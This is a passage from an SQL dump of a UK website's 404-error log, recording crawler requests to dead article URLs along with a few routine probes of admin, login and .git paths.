Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36751,'2023-01-25 12:29:01','/preparer2/iy3599je2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36752,'2023-01-25 12:40:15','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:103.0) Gecko/20100101 Firefox/101.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(36753,'2023-01-25 12:57:08','/amperesecond/96sl38jd2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(36754,'2023-01-25 13:14:37','/wfg88pne2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36755,'2023-01-25 13:25:01','/articles/blue-mile/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)',NULL,404,'GET',NULL,'65.108.46.72'),(36756,'2023-01-25 13:25:05','/articles/cruelty-free-products/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)',NULL,404,'GET',NULL,'65.108.46.72'),(36757,'2023-01-25 13:29:49','/adult-web-cams/mature-web-cams.htm','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; SemrushBot; +http://www.semrush.com/bot.html)','http://www.dailyjolly.co.uk/adult-web-cams/mature-web-cams.htm',404,'HEAD',NULL,'85.208.98.18'),(36758,'2023-01-25 13:32:29','/document/aloman6','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(36759,'2023-01-25 13:36:08','/asah1r3e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36760,'2023-01-25 13:45:49','/mri/d500u3ug2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(36761,'2023-01-25 13:56:47','/wf6svj6h2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.60'),(36762,'2023-01-25 14:06:31','/dofggste2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.155'),(36763,'2023-01-25 14:07:00','/wp3gmlbe2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36764,'2023-01-25 14:07:12','/contriving/9r0nye0e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(36765,'2023-01-25 14:18:05','/1hba5i4e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36766,'2023-01-25 14:20:10','/9oqzrlfe2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36767,'2023-01-25 14:28:55','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(36768,'2023-01-25 14:31:21','/admin/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',NULL,404,'GET',NULL,'206.189.136.160'),(36769,'2023-01-25 14:31:25','/login','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',NULL,404,'GET',NULL,'206.189.136.160'),(36770,'2023-01-25 14:38:31','/koe6s4tf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36771,'2023-01-25 15:10:25','/t21uz84g2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36772,'2023-01-25 15:15:40','/kqhhrmmg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(36773,'2023-01-25 15:15:44','/gloated2/d6bqs9se2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.60'),(36774,'2023-01-25 15:16:34','/a4iahlbf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.60'),(36775,'2023-01-25 15:25:52','/bee-clever-lands-at-the-eden-project','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.74.95'),(36776,'2023-01-25 15:39:31','/jackatalltrades/iybiwhkd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(36777,'2023-01-25 15:40:12','/limiting/w9nb9z0e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(36778,'2023-01-25 15:43:52','/bee-clever-lands-at-the-eden-project','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.101 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.74.93'),(36779,'2023-01-25 15:46:26','/wispen1/wl7lp75e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36780,'2023-01-25 15:47:11','/wxwuo43e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(36781,'2023-01-25 15:53:28','/inhalent/i2tkurne2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.60'),(36782,'2023-01-25 16:36:30','/ads.txt','https://www.dailyjolly.co.uk','Google-adstxt',NULL,404,'GET',NULL,'66.249.74.91'),(36783,'2023-01-25 16:38:57','/categories-b21waGFsb3RvbXk4.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36784,'2023-01-25 16:51:29','/10y4h8je2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36785,'2023-01-25 17:11:12','/imho48he2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36786,'2023-01-25 17:21:01','/printery/iscjtz3f2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36787,'2023-01-25 17:31:41','/anthokyan3/9fdozocf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(36788,'2023-01-25 17:51:29','/albula5/iy72dhjd2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.60'),(36789,'2023-01-25 18:08:03','/.git/HEAD','https://www.dailyjolly.co.uk','RepoLookoutBot/v1.1.0-3-g1e52068 (abuse reports to abuse@repo-lookout.org)','https://dailyjolly.co.uk/.git/HEAD',404,'GET',NULL,'3.72.74.40'),(36790,'2023-01-25 18:23:03','/acivnwlf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.60'),(36791,'2023-01-25 18:27:25','/wputxyxg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36792,'2023-01-25 18:31:35','/knowledge-bm9uc2VsZg1.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(36793,'2023-01-25 18:36:37','/ads.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.74.91'),(36794,'2023-01-25 18:40:19','/ky7rn6ge2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(36795,'2023-01-25 18:51:04','/imi7aqyf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36796,'2023-01-25 18:52:06','/articles/blue-mile/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)','https://www.dailyjolly.co.uk/blog/are-you-training-for-the-blue-mile-check-out-our-tips',404,'GET',NULL,'167.172.190.41'),(36797,'2023-01-25 18:52:07','/feel-good/ecover-garden/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)','https://www.dailyjolly.co.uk/blog/bee-clever-lands-at-the-eden-project',404,'GET',NULL,'167.172.190.41'),(36798,'2023-01-25 18:52:07','/message-in-our-bottle/green-cleaning-innovation-infographic/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)','https://www.dailyjolly.co.uk/blog/bee-clever-lands-at-the-eden-project',404,'GET',NULL,'167.172.190.41'),(36799,'2023-01-25 18:52:07','/feel-good/help-support-our-bees/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)','https://www.dailyjolly.co.uk/blog/bee-clever-lands-at-the-eden-project',404,'GET',NULL,'167.172.190.41'),(36800,'2023-01-25 18:52:07','/green-production-values','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)','https://www.dailyjolly.co.uk/blog/something-to-think-about-when-cleaning-the-toilet',404,'GET',NULL,'167.172.190.41'),(36801,'2023-01-25 18:52:08','/our-ecological-factory','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)','https://www.dailyjolly.co.uk/blog/something-to-think-about-when-cleaning-the-toilet',404,'GET',NULL,'167.172.190.41'),(36802,'2023-01-25 18:52:08','/travel-hints-and-tips','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)','https://www.dailyjolly.co.uk/blog/are-you-going-to-a-festival-in-the-summer-of-2018-read-our-tips-today',404,'GET',NULL,'167.172.190.41'),(36803,'2023-01-25 18:52:09','/ecover-products-contain-no-nasties','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)','https://www.dailyjolly.co.uk/blog/are-you-going-to-a-festival-in-the-summer-of-2018-read-our-tips-today',404,'GET',NULL,'167.172.190.41'),(36804,'2023-01-25 18:52:09','/articles/fantastic-plantastic/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)','https://www.dailyjolly.co.uk/blog/our-ecological-factory',404,'GET',NULL,'167.172.190.41'),(36805,'2023-01-25 18:52:09','/friends/boden/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)','https://www.dailyjolly.co.uk/blog/green-production-values',404,'GET',NULL,'167.172.190.41'),(36806,'2023-01-25 18:52:12','/articles/no-nasties/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)','https://www.dailyjolly.co.uk/blog/biological-cleaning-and-the-enzyme-myth',404,'GET',NULL,'167.172.190.41'),(36807,'2023-01-25 18:52:12','/offers-and-competitions/bio-bundle/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)','https://www.dailyjolly.co.uk/blog/biological-cleaning-and-the-enzyme-myth',404,'GET',NULL,'167.172.190.41'),(36808,'2023-01-25 18:52:12','/friends/observer-ethical-awards/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)','https://www.dailyjolly.co.uk/blog/bat-or-bird-box',404,'GET',NULL,'167.172.190.41'),(36809,'2023-01-25 18:52:13','/offers-and-competitions/bob-box-competition/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)','https://www.dailyjolly.co.uk/blog/bat-or-bird-box',404,'GET',NULL,'167.172.190.41'),(36810,'2023-01-25 18:52:14','/message-in-our-bottle/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)','https://www.dailyjolly.co.uk/blog/fantastic-plant-astic',404,'GET',NULL,'167.172.190.41'),(36811,'2023-01-25 18:52:14','/products/washing-up/washing-up-liquids/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)','https://www.dailyjolly.co.uk/blog/grey-water',404,'GET',NULL,'167.172.190.41'),(36812,'2023-01-25 18:52:14','/articles/factory-facts/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)','https://www.dailyjolly.co.uk/blog/grey-water',404,'GET',NULL,'167.172.190.41'),(36813,'2023-01-25 18:52:15','/articles/bat-or-bird-box/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)','https://www.dailyjolly.co.uk/blog/observer-ethical-values-nominate-your-winner',404,'GET',NULL,'167.172.190.41'),(36814,'2023-01-25 18:52:15','/articles/about-ecover/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)','https://www.dailyjolly.co.uk/blog/ecover-products-contain-no-nasties',404,'GET',NULL,'167.172.190.41'),(36815,'2023-01-25 18:52:15','/articles/optical-brighteners/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)','https://www.dailyjolly.co.uk/blog/ecover-products-contain-no-nasties',404,'GET',NULL,'167.172.190.41'),(36816,'2023-01-25 18:52:16','/articles/foam-boosters/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)','https://www.dailyjolly.co.uk/blog/ecover-products-contain-no-nasties',404,'GET',NULL,'167.172.190.41'),(36817,'2023-01-25 18:52:16','/articles/cruelty-free-products/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)','https://www.dailyjolly.co.uk/blog/ecover-products-contain-no-nasties',404,'GET',NULL,'167.172.190.41'),(36818,'2023-01-25 18:52:16','/articles/our-ingredients/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)','https://www.dailyjolly.co.uk/blog/ecover-products-contain-no-nasties',404,'GET',NULL,'167.172.190.41'),(36819,'2023-01-25 18:52:16','/articles/sensitive-skin/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)','https://www.dailyjolly.co.uk/blog/ecover-products-contain-no-nasties',404,'GET',NULL,'167.172.190.41'),(36820,'2023-01-25 18:52:17','/friends/ada-zanditon/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)','https://www.dailyjolly.co.uk/blog/ada-zanditon-at-london-fashion-week',404,'GET',NULL,'167.172.190.41'),(36821,'2023-01-25 18:52:17','/my-ecover/forums/topics/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)','https://www.dailyjolly.co.uk/blog/the-uk-hosepipe-ban',404,'GET',NULL,'167.172.190.41'),(36822,'2023-01-25 18:52:17','/friends/wateraid/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)','https://www.dailyjolly.co.uk/blog/wateraid-project',404,'GET',NULL,'167.172.190.41'),(36823,'2023-01-25 18:52:17','/wear-and-care/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)','https://www.dailyjolly.co.uk/blog/the-secret-to-powerful-stain-removal',404,'GET',NULL,'167.172.190.41'),(36824,'2023-01-25 18:52:18','/articles/biological-cleaning-and-the-enzyme-myth/','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)','https://www.dailyjolly.co.uk/blog/the-secret-to-powerful-stain-removal',404,'GET',NULL,'167.172.190.41'),(36825,'2023-01-25 19:19:37','/ksrkg40e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36826,'2023-01-25 19:23:11','/advice/revolt1','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(36827,'2023-01-25 19:23:13','/dii6qw5f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(36828,'2023-01-25 19:27:58','/wn2ha90e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36829,'2023-01-25 19:28:17','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/80.0.1055.1 Safari/535.24','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(36830,'2023-01-25 19:28:51','/9og0dmlf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36831,'2023-01-25 19:42:02','/96h1rrme2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36832,'2023-01-25 19:42:25','/document/lev-bGV2aX/253inter','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36833,'2023-01-25 19:49:44','/targk52e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(36834,'2023-01-25 19:58:30','/answers/cmVxdwl0zwq-57','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36835,'2023-01-25 20:08:09','/tfq3cvbg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36836,'2023-01-25 20:23:16','/trey/1qdq9xbe2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36837,'2023-01-25 20:26:32','/ag073fbg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(36838,'2023-01-25 20:31:35','/i8nt892e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(36839,'2023-01-25 20:36:58','/dim06taf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(36840,'2023-01-25 20:39:15','/store/a0w6p9qg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36841,'2023-01-25 20:46:56','/aufihb9e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.60'),(36842,'2023-01-25 20:49:59','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:103.0) Gecko/20100101 Firefox/103.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(36843,'2023-01-25 21:23:28','/aiiej13e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(36844,'2023-01-25 21:35:56','/forum/typifi20','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36845,'2023-01-25 21:41:51','/dsy4t92e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(36846,'2023-01-25 21:48:01','/k0ufogsf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.60'),(36847,'2023-01-25 21:59:08','/orycteropus16/9ri2c1be2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36848,'2023-01-25 22:17:43','/10n2p7mg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36849,'2023-01-25 22:19:38','/wnrdzduf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(36850,'2023-01-25 22:24:32','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(36851,'2023-01-25 22:36:40','/a67sd61g2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36852,'2023-01-25 